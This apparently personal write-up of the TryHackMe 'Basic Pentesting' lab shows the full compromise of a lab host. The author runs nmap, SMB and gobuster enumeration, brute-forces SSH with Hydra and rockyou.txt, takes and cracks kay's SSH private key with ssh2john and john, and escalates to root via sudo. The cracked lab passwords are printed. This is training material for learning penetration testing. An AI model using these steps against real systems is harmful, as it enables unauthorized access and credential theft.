CTF-Writeups/TryHackMe/Basic_pentesting.md
2020-11-01 23:33:29 +05:00

16 KiB

TryHackMe-Basic Pentesting

Abdullah Rizwan | 07:04 PM | 1st November , 2020

NMAP


Nmap scan report for 10.10.207.136                                        
Host is up (0.17s latency).                                                                                                                         
Not shown: 994 closed ports          
PORT     STATE SERVICE     VERSION                                                                                                                  
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                                                                                                      
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)                                                                                      
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)                                                                                     
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)                                                                                   
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))                                                                                           
|_http-server-header: Apache/2.4.18 (Ubuntu)                                                                                                        
|_http-title: Site doesn't have a title (text/html).                                                                                                
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)                                                                              
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 
8009/tcp open  ajp13?                                                                                                                               
| ajp-methods:                                                                                                                                      
|_  Supported methods: GET HEAD POST OPTIONS                                                                                                        
8080/tcp open  http-proxy                                                                                                                           
| fingerprint-strings:                                                                                                                              
|   ms-sql-s, oracle-tns:                                                                                                                           
|     HTTP/1.1 400                                                                                                                                  
|     Content-Type: text/html;charset=utf-8                                                                                                         
|     Content-Language: en                                                                                                                          
|     Content-Length: 2243                                                                                                                          
|     Date: Sun, 01 Nov 2020 14:11:05 GMT                                                                                                           
|     Connection: close                                                                                                                             
|     <!doctype html><html lang="en"><head><title>HTTP Status 400                                                                                   
|_    Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font
ily:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-c
olor:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;
color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name 
{color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/
submit.cgi?new-service :             
SF-Port8080-TCP:V=7.80%I=7%D=11/1%Time=5F9EC1F9%P=x86_64-pc-linux-gnu%r(or 
SF:acle-tns,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charse 
SF:t=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\ 
SF:x20Sun,\x2001\x20Nov\x202020\x2014:11:05\x20GMT\r\nConnection:\x20close 
SF:\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Sta 
SF:tus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"te 
SF:xt/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;backgro 
SF:und-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,s 
SF:ans-serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x 
SF:20{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#52 
SF:5D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;c 
SF:olor:black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,s 
SF:ans-serif;color:white;background-color:#525D76;}\x20p\x20{font-family:T 
SF:ahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}\x2 
SF:0a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height: 
SF:1px;background-color:#525D76;border:none;}</style></head><bod")%r(ms-sq 
SF:l-s,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=utf 
SF:-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\x20Su 
SF:n,\x2001\x20Nov\x202020\x2014:11:05\x20GMT\r\nConnection:\x20close\r\n\ 
SF:r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\x 
SF:20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"text/cs 
SF:s\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;background-c 
SF:olor:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-s 
SF:erif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x20{fo 
:0{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:1px;b 
SF:ackground-color:#525D76;border:none;}</style></head><bod");
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel                                                                               
                                     
Host script results:                                                                                                                                
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s                                                                                       
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:                                                                                                                                 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)                                                                                                           
|   Computer name: basic2                                                                                                                           
|   NetBIOS computer name: BASIC2\x00                                                                                                               
|   Domain name: \x00                                                                                                                               
|   FQDN: basic2                                                                                                                                    
|_  System time: 2020-11-01T09:11:08-05:00                                                                                                          
| smb-security-mode:                                                                                                                                
|   account_used: guest                                                                                                                             
|   authentication_level: user                                                                                                                      
|   challenge_response: supported                                                                                                                   
|_  message_signing: disabled (dangerous, but default)                                                                                              
| smb2-security-mode:                                                                                                                               
|   2.02:                                                                                                                                           
|_    Message signing enabled but not required                                                                                                      
| smb2-time:                                                                                                                                        
|   date: 2020-11-01T14:11:08                                                                                                                       
|_  start_date: N/A                                                                                                                                 
                                                                                                                                                    
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.02 seconds                                               

PORT 80

PORT 8080

Smb Shares

Port 139 and 445 are open see lets see if we can access the samba shares

From the staff.txt that we just grabbed , we can find two usernames jan and kay.

Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)

-Kay

Gobuster

Running gobuster we can find a directory /development

gobuster dir -u http://10.10.207.136/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.207.136/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/11/01 19:18:49 Starting gobuster
===============================================================
/development (Status: 301)
Progress: 3698 / 220561 (1.68%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/11/01 19:20:02 Finished
===============================================================

j.txt

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

dev.txt


2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

Hydra

Now jan is the username we found and it has a weak password so lets bruteforce it using hydra and we know that there is ssh runnin on the box so,

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.207.136 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-01 19:27:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.207.136:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344223 to do in 1358:22h, 16 active
 
t[STATUS] 112.00 tries/min, 336 tries in 00:03h, 14344063 to do in 2134:32h, 16 active
tt
[22][ssh] host: 10.10.207.136   login: jan   password: armando

Visti kay's home directory and there you can read .ssh/id_rsa private key for logging into ssh , send and receive it through netcat

But we still cannot login because that id_rsa is password protected

Use ssh2john to get hash of id_rsa file

root@kali:~/TryHackMe/Easy/BasicPentesting# /usr/share/john/ssh2john.py id_rsa  > hash_for_id_rsa

Now run john hash_for_id_rsa

Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
0g 0:00:00:56  3/3 0g/s 2748Kp/s 2748Kc/s 2748KC/s pigr3sr..pigr0ts
0g 0:00:00:57  3/3 0g/s 2760Kp/s 2760Kc/s 2760KC/s jalyoun..jalyof4
0g 0:00:00:58  3/3 0g/s 2772Kp/s 2772Kc/s 2772KC/s 1llgod..1llgu1
0g 0:00:05:23  3/3 0g/s 2294Kp/s 2294Kc/s 2294KC/s fcp0luf..fcp0l46
0g 0:00:05:24  3/3 0g/s 2297Kp/s 2297Kc/s 2297KC/s nadah76..nadahro
0g 0:00:06:36  3/3 0g/s 2351Kp/s 2351Kc/s 2351KC/s gaudlsd..gaudsk3
0g 0:00:07:21  3/3 0g/s 2381Kp/s 2381Kc/s 2381KC/s civlup42..civl12mt
0g 0:00:07:22  3/3 0g/s 2384Kp/s 2384Kc/s 2384KC/s adiskak2..adiskuas
0g 0:00:09:14  3/3 0g/s 2527Kp/s 2527Kc/s 2527KC/s cornsexice..cornsexto1
0g 0:00:09:15  3/3 0g/s 2528Kp/s 2528Kc/s 2528KC/s cujkdc1..cujkdd4
0g 0:00:09:16  3/3 0g/s 2530Kp/s 2530Kc/s 2530KC/s bslhmf6..bslhm82
0g 0:00:09:17  3/3 0g/s 2532Kp/s 2532Kc/s 2532KC/s psyctiu..psyct29
0g 0:00:09:18  3/3 0g/s 2534Kp/s 2534Kc/s 2534KC/s tr00ge1..tr00gak
0g 0:00:09:19  3/3 0g/s 2536Kp/s 2536Kc/s 2536KC/s kmdufs1..kmduf6q
0g 0:00:12:52  3/3 0g/s 2458Kp/s 2458Kc/s 2458KC/s ecicos7..ecicots
0g 0:00:12:53  3/3 0g/s 2460Kp/s 2460Kc/s 2460KC/s eussce7..eussc14
0g 0:00:12:54  3/3 0g/s 2461Kp/s 2461Kc/s 2461KC/s exxza8f..exxzay!
0g 0:00:12:55  3/3 0g/s 2463Kp/s 2463Kc/s 2463KC/s eevzco5..eevzcuk
0g 0:00:12:56  3/3 0g/s 2464Kp/s 2464Kc/s 2464KC/s ublhl..ublni
0g 0:00:12:57  3/3 0g/s 2466Kp/s 2466Kc/s 2466KC/s 0zjnhb..0zjnd4
0g 0:00:12:58  3/3 0g/s 2467Kp/s 2467Kc/s 2467KC/s l4zb3n..l4zpay
0g 0:00:12:59  3/3 0g/s 2469Kp/s 2469Kc/s 2469KC/s hfu71s..hfu706
0g 0:00:13:01  3/3 0g/s 2471Kp/s 2471Kc/s 2471KC/s 4s18le..4s18cw
0g 0:00:13:02  3/3 0g/s 2473Kp/s 2473Kc/s 2473KC/s mcjau03..mcjau25
0g 0:00:13:03  3/3 0g/s 2474Kp/s 2474Kc/s 2474KC/s cim0cno..cim0c11
beeswax          (id_rsa)

Now to become root we can run ALL commands

Matching Defaults entries for kay on basic2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kay may run the following commands on basic2:
    (ALL : ALL) ALL
kay@basic2:~$ 

so sudo bash